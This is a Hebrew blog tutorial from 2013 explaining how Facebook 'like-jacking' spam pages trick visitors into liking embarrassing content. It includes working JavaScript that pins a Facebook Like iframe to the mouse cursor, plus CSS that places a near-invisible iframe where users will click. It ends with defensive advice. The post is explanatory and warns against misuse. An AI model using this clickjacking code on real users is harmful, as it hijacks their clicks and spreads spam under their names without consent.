אינטרנט ישראל
  • ראשי
  • אודות רן בר-זיק ואינטרנט ישראל
  • ערוץ טלגרם
  • מסטודון
  • התחברו אלי בטוויטר
  • התחברו אלי בלינקדאין
  • ספר ג'אווהסקריפט
  • ראשי
  • אודות רן בר-זיק ואינטרנט ישראל
  • ערוץ טלגרם
  • מסטודון
  • התחברו אלי בטוויטר
  • התחברו אלי בלינקדאין
  • ספר ג'אווהסקריפט
ראשי » מדריכים » אפליקצית פייסבוק » איך וירוסים בפייסבוק עובדים?

איך וירוסים בפייסבוק עובדים?

רן בר-זיק אפריל 7, 2013 7:48 am אין תגובות

שוב נכנסתם לדף מפוקפק וראיתם בפיד הפייסבוק שלכם שעשיתם לייק ל'בר רפאלי ערומה'? ככה עשו לכם את זה.

כדאי תמיד להשאר מעודכנים! אם יש לכם טלגרם, בדקו את ערוץ הטלגרם של האתר שבו אני מעדכן על פוסטים חדשים 🙂 אם אתם רוצים ללמוד תכנות באופן מקיף ומסודר, הצטרפו לאלפי הלומדים בפרויקט "ללמוד ג'אווהסקריפט בעברית" שמלמד לתכנת בג'אווהסקריפט, ב-Node.js ובריאקט וגם מלמד על תרומה לקוד פתוח. גם ספרים דיגיטליים וגם ספרים מודפסים. בשיתוף הקריה האקדמית אונו ובתמיכת חברות מובילות כגון Wix, Outbrain, Elementor, Iron Source, Chegg, Really Good ועוד.

כולנו מכירים את זה, אנחנו גולשים להנאתנו בפייסבוק ופתאום בפיד רואים שאדם מכובד כלשהו עושה לייק למשהו מביך. כמה מביך?
פרופסור פון פדהוצרשטיין אהב את He licked her by mistake (במקרה הטוב) או "הרב אליקים אהב את בר רפאלי ערומה! רואים לה הכל!!1" (במקרה הפחות טוב).

הדבר האתי לעשות, אחרי הגיחוך, הוא לשלוח מסר לאיש ולומר לו שהוא נדבק בוירוס בפייסבוק ושיבצע הסרה לדפים האלו מהפיד שלו באופן ידני. עולה השאלה – איך בדיוק זה עובד? על זה בדיוק אני רוצה לכתוב במאמר הזה.

ראשית, אנחנו צריכים ליצור תוכן ויראלי כלשהו, משהו שאנשים ירצו ללחוץ עליו (אך לא בטוח שירצו לחשוף שלחצו עליו). משהו בסגנון של – בר רפאלי ערומה! (עם הקוראת בר רפאלי הסליחה, אבל השם שלך באמת מוכר). מדובר בדף HTML פשוט שיכול להיות בו סרטון או איזושהי התחכמות אחרת.

אנחנו צריכים לגרום לגולש להכנס לדף ולעשות לו 'לייק'. די ברור שכל קורא סטרייט יתפתה להכנס לדף הזה, אבל לייק? גם אם ישימו לי אקדח לראש אני לא אודה בפני הפיד היקר שלי שכולל את אשתי וילדי שאני התעניינתי בבר רפאלי בעירום. העניין הוא לבצע את הלייק על מנת שבפני הפיד של הלקוח יופץ הסרטון ויגרום לעוד ועוד אנשים לבצע לייק. את הפעולה של הלייק אפשר לבצע בשתי דרכים פשוטות מאד. הראשונה היא clickjacking והשניה, היותר פשוטה, היא מיסוך באמצעות CSS.

הערת אזהרה מתבקשת: אל תשתמשו בקוד כאן על מנת ליצור וירוס בפייסבוק. אם אתם מספיק מטומטמים בשביל לעשות את זה, אל תגדילו את הטמטום ותפנו אלי בבקשה לעזור לכם לייצר את הוירוס הזה.

Clickjacking

באופן עקרוני, ביצוע של clickjacking עובד ככה:

1. המשתמש לוחץ על משהו בדף שלנו (כמו כפתור ה-Play של הסרטון).
2. אנו חוטפים את הקליק ומשתמשים בו לכפתור הלייק שלנו.
3. התוכן מופיע בפיד של המשתמש.
4. משתמשים נוספים מתפתים להכנס לדף וחזרה לסעיף 1.

איך עושים את זה? בקלות! סקריפט קטן של JavaScript מצמיד את כפתור הלייק לסמן העכבר של המשתמש, ברגע שהמשתמש לוחץ באיזשהו מקום בדף – יש לנו לייק!

והנה הדמו המיוחל – שימו לב שבדמו כפתור הלייק מוצג בפני המשתמש לשם ההדגמה – בפועל, הכפתור יהיה שקוף ולמשתמש לא יהיה שום מושג שבמקום ללחוץ על לחצן ה-play, הוא לוחץ על לייק ומעכשיו הדף הויראלי נמצא בפיד שלו.

הקוד הוא פשוט ביותר, יוצרים כפתור לייק מבוסס iframe. יוצרים אירוע של הזזת עכבר ובאמצעותו מצמידים את כפתור הלייק שלנו אל העכבר של המשתמש. זה הכל, ברגע שהמשתמש עושה קליק, תפסנו אותו.


		(function(){
			  var tempX = 0,
			  tempY = 0;
			  
			  var hiddenLike = document.createElement('iframe');
			  hiddenLike.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(document.location.href) + '&locale=en_US&layout=standard&show_faces=true&width=53&action=like&colorscheme=light&height=80';
			  hiddenLike.scrolling = 'no';
			  hiddenLike.frameBorder = 0;
			  hiddenLike.allowTransparency = 'true';
			  hiddenLike.style.border = 0;
			  hiddenLike.style.overflow = 'hidden';
			  hiddenLike.style.cursor = 'pointer';
			  hiddenLike.style.width = '40px';
			  hiddenLike.style.height =  '20px';
			  hiddenLike.style.position = 'absolute';
			  hiddenLike.style.opacity = .85; //Would be 0 if really hidden
			  document.getElementsByTagName('body')[0].appendChild(hiddenLike);
			  
			  window.addEventListener('mousemove', mouseMove, false);
			  
			  
			  function mouseMove(e) {

				  tempX = e.pageX;
				  tempY = e.pageY;
				
				if (tempX < 0) tempX = 0;
				if (tempY < 0) tempY = 0;
				
				hiddenLike.style.top = (tempY - 8) + 'px';
				hiddenLike.style.left = (tempX - 20) + 'px';
				
				return true
			  }
		})();

CSS

זה טריק אפילו עוד יותר קל ונחמד – פשוט ממקמים את ה-iframe במקום שבו אנו בטוחים שהמשתמש ילחץ ומחביאים אותו באמצעות פרמטר opacity. האם יש משהו קל ופשוט מזה? הנה הדוגמה החיה . שימו לב ששם עשיתי את כפתור הלייק חצי שקוף לשם ההמחשה.

קוד ה-CSS נראה בערך ככה:


			#myIframe {
				position: absolute;
				top: 232px;
				right: 115px;
				opacity: 0.85; /* Would be 0 if really hidden */
			}

ואני מצמיד אותו ל-iframe כמובן.

מכאן – הכל פתוח בהתאם לרצון של מי שרוצה לייצר את הדף. אפשר לבצע בדיקה מי עשה לייק ואז להציג בפני המשתמשים את התוכן הרלוונטי או לעולל תעלולים נוספים.

דרכי התגוננות

אחרי שמבינים איך זה עובד, קל להתגונן – פשוט לא ללחוץ בשום מקום באתרים מפוקפקים שהגעתם אליהם דרך פייסבוק. אם אתם ממש רוצים לראות את הסרטון, הכנסו באמצעות דפדפן שאינו מחובר לפייסבוק (למשל כרום במצב פרטיות). בכל מקרה, תמיד אפשר להכנס אל ה-Activity Log ולמחוק משם את הדף הסורר ולדווח עליו כספאם.

כדאי תמיד להשאר מעודכנים! אם יש לכם טלגרם, בדקו את ערוץ הטלגרם של האתר שבו אני מעדכן על פוסטים חדשים 🙂 אם אתם רוצים ללמוד תכנות באופן מקיף ומסודר, הצטרפו לאלפי הלומדים בפרויקט "ללמוד ג'אווהסקריפט בעברית" שמלמד לתכנת בג'אווהסקריפט, ב-Node.js ובריאקט וגם מלמד על תרומה לקוד פתוח. גם ספרים דיגיטליים וגם ספרים מודפסים. בשיתוף הקריה האקדמית אונו ובתמיכת חברות מובילות כגון Wix, Outbrain, Elementor, Iron Source, Chegg, Really Good ועוד.
פייסבוק

השארת תגובה

ביטול

ללמוד ג'אווהסקריפט בעברית

ללמוד לתכנת ג'אווהסקריפט בעברית שגייס יותר משלוש מאות אלף שקל ולמעלה מ-2000 תומכים - בואו ללמוד עכשיו איך לתכנת.

רשימת הנושאים
  • מדריכים
    • ריאקט
    • טייפסקריפט
    • ECMAScript 6
    • ES20XX
    • Node.js
    • Express
    • רספברי פיי
    • Babel
    • docker
    • MongoDB
    • Git
    • לימוד MySQL
    • SASS
    • jQuery
    • CSS3
    • HTML 5
    • SVN
    • LESS
  • פיתוח אינטרנט
    • פתרונות ומאמרים על פיתוח אינטרנט
    • jQuery Scripts
    • jQuery למתקדמים
    • יסודות בתכנות
    • נגישות אינטרנט
  • חדשות אינטרנט
  • מידע כללי על אינטרנט
    • רשת האינטרנט
    • בניית אתרי אינטרנט
  • rss logo

    לכל המאמרים

    לכל המאמרים שפורסמו באינטרנט ישראל משנת 2008 ועד עכשיו.
  • rss logo

    RSS Feed

    משתמשים בקורא RSS? אם כן, עקבו אחרי אינטרנט ישראל באמצעות פיד ה-RSS!
    מה זה RSS?
  • Twitter logo

    עקבו אחרי בטוויטר

    בחשבון הטוויטר שלי אני מפרסם עדכונים מהירים על חדשות בתחום התכנות והיזמות, התרעות על מצבי חירום ורכילות בוערת על תחום הווב.
    מה זה טוויטר?
  • facebook like image

    ערוץ הטלגרם של אינטרנט ישראל

    בערוץ הטלגרם של אינטרנט ישראל אני מפרסם את הפוסטים של באתר וכן עדכונים טכנולוגיים נוספים.
    מה זה טלגרם?
  • github logo

    הפרויקטים שלי בגיטהאב

    הפרויקטים שאני כותב ושוחררו לציבור ברישיון קוד פתוח נמצאים ברובם בגיטהאב.
חיפוש

כל הזכויות שמורות לרן בר-זיק ולאינטרנט ישראל | מדיניות הפרטיות של אתר אינטרנט ישראל | אתר אינטרנט ישראל נגיש לפי תקן WCAG 2.0 AA | הצהרת הנגישות של האתר | אבטחת מידע ודיווח על בעיית אבטחת מידע

גלילה לראש העמוד